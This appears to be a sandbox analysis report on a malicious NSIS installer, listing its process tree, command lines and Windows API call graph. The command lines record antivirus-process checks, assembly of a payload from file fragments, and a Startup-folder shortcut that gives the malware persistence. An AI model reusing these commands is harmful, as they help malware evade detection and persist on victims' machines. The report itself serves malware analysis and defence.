                                        File size:1'048'576 bytes
                                        MD5 hash:DB7B43084F7A44E3290774E36D49CE41
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:20:30:29
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\cmd.exe" /c move Sunset Sunset.bat & Sunset.bat
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:20:30:29
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xbb0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:4
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "wrsa opssvc"
                                        Imagebase:0xd0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:5
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                        Wow64 process (32bit):true
                                        Commandline:tasklist
                                        Imagebase:0xbb0000
                                        File size:79'360 bytes
                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:6
                                        Start time:20:30:30
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                        Imagebase:0x7ff7699e0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c md 182349
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\findstr.exe
                                        Wow64 process (32bit):true
                                        Commandline:findstr /V "RefundAlienConservativeChapters" Coral
                                        Imagebase:0xd0000
                                        File size:29'696 bytes
                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:9
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /c copy /b ..\Cause + ..\Shopper + ..\Edges + ..\Zinc + ..\Correlation + ..\Wearing + ..\Provision + ..\Res l
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Users\user\AppData\Local\Temp\182349\Beginners.pif
                                        Wow64 process (32bit):true
                                        Commandline:Beginners.pif l
                                        Imagebase:0xb0000
                                        File size:893'608 bytes
                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 5%, ReversingLabs
                                        • Detection: 11%, Virustotal, Browse
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:11
                                        Start time:20:30:31
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\choice.exe
                                        Wow64 process (32bit):true
                                        Commandline:choice /d y /t 5
                                        Imagebase:0x5d0000
                                        File size:28'160 bytes
                                        MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:12
                                        Start time:20:30:32
                                        Start date:01/10/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & echo URL="C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url" & exit
                                        Imagebase:0x240000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:13
                                        Start time:20:30:32
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:14
                                        Start time:20:30:42
                                        Start date:01/10/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.js"
                                        Imagebase:0x7ff78c480000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:20:30:42
                                        Start date:01/10/2024
                                        Path:C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\TradeOptimize Dynamics\TradeHub.scr" "C:\Users\user\AppData\Local\TradeOptimize Dynamics\z"
                                        Imagebase:0xd60000
                                        File size:893'608 bytes
                                        MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 5%, ReversingLabs
                                        • Detection: 11%, Virustotal, Browse
                                        Has exited:false

                                          Execution Graph

                                          Execution Coverage:17.8%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:20.7%
                                          Total number of Nodes:1526
                                          Total number of Limit Nodes:33
                                          execution_graph 4342 402fc0 4343 401446 18 API calls 4342->4343 4344 402fc7 4343->4344 4345 403017 4344->4345 4346 40300a 4344->4346 4349 401a13 4344->4349 4347 406805 18 API calls 4345->4347 4348 401446 18 API calls 4346->4348 4347->4349 4348->4349 4350 4023c1 4351 40145c 18 API calls 4350->4351 4352 4023c8 4351->4352 4355 40726a 4352->4355 4358 406ed2 CreateFileW 4355->4358 4359 406f04 4358->4359 4360 406f1e ReadFile 4358->4360 4361 4062a3 11 API calls 4359->4361 4362 4023d6 4360->4362 4365 406f84 4360->4365 4361->4362 4363 4071e3 CloseHandle 4363->4362 4364 406f9b ReadFile lstrcpynA lstrcmpA 4364->4365 4366 406fe2 SetFilePointer ReadFile 4364->4366 4365->4362 4365->4363 4365->4364 4369 406fdd 4365->4369 4366->4363 4367 4070a8 ReadFile 4366->4367 4368 407138 4367->4368 4368->4367 4368->4369 4370 40715f SetFilePointer GlobalAlloc ReadFile 4368->4370 4369->4363 4371 4071a3 4370->4371 4372 4071bf lstrcpynW GlobalFree 4370->4372 4371->4371 4371->4372 4372->4363 4373 401cc3 4374 40145c 18 API calls 4373->4374 4375 401cca lstrlenW 4374->4375 4376 4030dc 4375->4376 4377 4030e3 4376->4377 4379 405f51 wsprintfW 4376->4379 4379->4377 4394 401c46 4395 40145c 18 API calls 4394->4395 4396 401c4c 4395->4396 4397 4062a3 11 API calls 4396->4397 4398 401c59 4397->4398 4399 406c9b 81 API calls 4398->4399 4400 401c64 4399->4400 4401 403049 4402 401446 18 API calls 4401->4402 4405 403050 4402->4405 4403 406805 18 API calls 4404 401a13 4403->4404 4405->4403 4405->4404 4406 40204a 4407 401446 18 API calls 4406->4407 4408 402051 IsWindow 4407->4408 4409 4018d3 4408->4409 4410 40324c 4411 403277 4410->4411 4412 40325e SetTimer 4410->4412 4413 4032cc 4411->4413 4414 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4411->4414 4412->4411 4414->4413 4415 4048cc 4416 4048f1 4415->4416 4417 4048da 4415->4417 4419 4048ff IsWindowVisible 4416->4419 4423 404916 4416->4423 4418 4048e0 4417->4418 4433 40495a 4417->4433 4420 403daf SendMessageW 
Execution Graph (file.exe)
The interactive graph rendering did not survive extraction; only its edge list remained, and it is summarised here. Each node is a function address in file.exe annotated with the Windows APIs that function calls; annotations of the form "N API calls" appear to stand for callees whose API list was collapsed. One node carries an ordinal import (#17) next to SetErrorMode and OleInitialize at the start-up function 403883. APIs present in the graph, grouped by purpose:
Start-up and installer flow (403883 and callees): SetErrorMode, OleInitialize, GetModuleHandleA/W, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, GetSystemDirectoryW, GetModuleFileNameW, GetTickCount, GetTempFileNameW, CreateDirectoryW, SetCurrentDirectoryW, CopyFileW, CreateProcessW, GetCurrentProcess, ExitWindowsEx, ExitProcess, CoUninitialize, Sleep
File system: GetFileAttributesW, SetFileAttributesW, CreateFileW, GetFileSize, SetFilePointer, ReadFile, WriteFile, DeleteFileW, MoveFileW, RemoveDirectoryW, FindFirstFileW, FindNextFileW, FindClose, SHFileOperationW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, GetLastError
Registry: RegOpenKeyExW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey
Dynamic API resolution and process inspection: LoadLibraryA/W, LoadLibraryExW, GetProcAddress, FreeLibrary, OpenProcess, CloseHandle, GetVersionExW, GlobalAlloc/GlobalFree/GlobalLock/GlobalUnlock
Clipboard: OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard
INI, version and environment: WritePrivateProfileStringW, GetPrivateProfileStringW, GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW, ExpandEnvironmentStringsW
COM and shell: CoCreateInstance, SHGetFileInfoW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree
UI and messaging: CreateDialogParamW, DialogBoxParamW, CreateWindowExW, RegisterClassW, GetClassInfoW, FindWindowExW, SendMessageW, SendMessageTimeoutW, PostQuitMessage, SetForegroundWindow, MessageBoxIndirectW, ShowWindow, EnableWindow, SetWindowLongW/GetWindowLongW, SetClassLongW, CreatePopupMenu, TrackPopupMenu, GetSystemMenu, EnableMenuItem, LoadImageW, SystemParametersInfoW, ImageList_Destroy, BeginPaint/EndPaint, CreateFontIndirectW, CreateBrushIndirect, GetDeviceCaps, MulDiv, PeekMessageW, DispatchMessageW
String helpers used throughout: lstrcpynW, lstrcpyA, lstrcatW, lstrlenW/lstrlenA, lstrcmpW/lstrcmpiW/lstrcmpiA, wsprintfW/wsprintfA, wvsprintfW, CharNextW/CharNextA, CharPrevW, CharUpperW, WideCharToMultiByte
MessageBoxIndirectW 4302->4327 4331 401b50 4302->4331 4338 401b5d 4302->4338 4339 405e50 GetFileAttributesW CreateFileW 4302->4339 4303->4302 4305->4302 4307 404f72 25 API calls 4306->4307 4309 401bb3 4307->4309 4308 404f72 25 API calls 4311 401b70 4308->4311 4312 40337f 37 API calls 4309->4312 4310->4302 4315 4062a3 11 API calls 4311->4315 4313 401bc6 4312->4313 4316 4062a3 11 API calls 4313->4316 4314->4302 4322 401b8b 4315->4322 4317 401bda 4316->4317 4318 401be9 SetFileTime 4317->4318 4319 401bf8 CloseHandle 4317->4319 4318->4319 4321 401c09 4319->4321 4319->4322 4320->4302 4323 401c21 4321->4323 4324 401c0e 4321->4324 4326 406805 18 API calls 4323->4326 4325 406805 18 API calls 4324->4325 4328 401c16 lstrcatW 4325->4328 4329 401c29 4326->4329 4327->4302 4328->4329 4330 4062a3 11 API calls 4329->4330 4332 401c34 4330->4332 4333 401b93 4331->4333 4334 401b53 4331->4334 4335 405ca0 MessageBoxIndirectW 4332->4335 4336 4062a3 11 API calls 4333->4336 4337 4062a3 11 API calls 4334->4337 4335->4322 4336->4322 4337->4338 4338->4308 4339->4302 4340->4296 4341->4297 5012 40209f GetDlgItem GetClientRect 5013 40145c 18 API calls 5012->5013 5014 4020cf LoadImageW SendMessageW 5013->5014 5015 4030e3 5014->5015 5016 4020ed DeleteObject 5014->5016 5016->5015 5017 402b9f 5018 401446 18 API calls 5017->5018 5023 402ba7 5018->5023 5019 402c4a 5020 402bdf ReadFile 5022 402c3d 5020->5022 5020->5023 5021 401446 18 API calls 5021->5022 5022->5019 5022->5021 5029 402d17 ReadFile 5022->5029 5023->5019 5023->5020 5023->5022 5024 402c06 MultiByteToWideChar 5023->5024 5025 402c3f 5023->5025 5027 402c4f 5023->5027 5024->5023 5024->5027 5030 405f51 wsprintfW 5025->5030 5027->5022 5028 402c6b SetFilePointer 5027->5028 5028->5022 5029->5022 5030->5019 5031 402b23 GlobalAlloc 5032 402b39 5031->5032 5033 402b4b 5031->5033 5034 401446 18 API calls 5032->5034 5035 40145c 18 API calls 5033->5035 5036 402b41 5034->5036 5037 402b52 WideCharToMultiByte lstrlenA 5035->5037 5038 402b93 5036->5038 5039 
402b84 WriteFile 5036->5039 5037->5036 5039->5038 5040 402384 GlobalFree 5039->5040 5040->5038 5042 4044a5 5043 404512 5042->5043 5044 4044df 5042->5044 5046 40451f GetDlgItem GetAsyncKeyState 5043->5046 5053 4045b1 5043->5053 5110 405c84 GetDlgItemTextW 5044->5110 5049 40453e GetDlgItem 5046->5049 5056 40455c 5046->5056 5047 4044ea 5050 406038 5 API calls 5047->5050 5048 40469d 5108 404833 5048->5108 5112 405c84 GetDlgItemTextW 5048->5112 5051 403d3f 19 API calls 5049->5051 5052 4044f0 5050->5052 5055 404551 ShowWindow 5051->5055 5058 403e74 5 API calls 5052->5058 5053->5048 5059 406805 18 API calls 5053->5059 5053->5108 5055->5056 5061 404579 SetWindowTextW 5056->5061 5066 405d59 4 API calls 5056->5066 5057 403dca 8 API calls 5062 404847 5057->5062 5063 4044f5 GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 
KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 
5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 
5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                          Control-flow Graph

                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                          • GetClientRect.USER32(?,?), ref: 00405196
                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                          • ShowWindow.USER32(?,00000008), ref: 0040523A
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                            • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                          • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                          • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                          • ShowWindow.USER32(00000000), ref: 004052E7
                                          • ShowWindow.USER32(?,00000008), ref: 004052EC
                                          • ShowWindow.USER32(00000008), ref: 00405333
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                          • CreatePopupMenu.USER32 ref: 00405376
                                          • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                          • GetWindowRect.USER32(?,?), ref: 0040539E
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                          • OpenClipboard.USER32(00000000), ref: 0040540B
                                          • EmptyClipboard.USER32 ref: 00405411
                                          • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                          • GlobalLock.KERNEL32(00000000), ref: 00405427
                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                          • CloseClipboard.USER32 ref: 0040546E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1747040442.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1747024973.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747087962.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747106689.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1747181228.00000000004F4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                          • String ID: @rD$New install of "%s" to "%s"${
                                          • API String ID: 2110491804-2409696222
                                          • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                          • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                          • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                          Control-flow Graph

                                          APIs
                                          • #17.COMCTL32 ref: 004038A2
                                          • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                          • OleInitialize.OLE32(00000000), ref: 004038B4
                                            • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                            • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                            • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                          • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                          • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                          • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                          • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                          • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                          • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                          • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                          • CoUninitialize.COMBASE(?), ref: 00403AD1
                                          • ExitProcess.KERNEL32 ref: 00403AF1
                                          • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                          • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                          • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                          • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                          • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                          • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                          • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                          • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                          Strings
                                          Similarity
                                          • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                          • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                          • API String ID: 2435955865-239407132
                                          • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
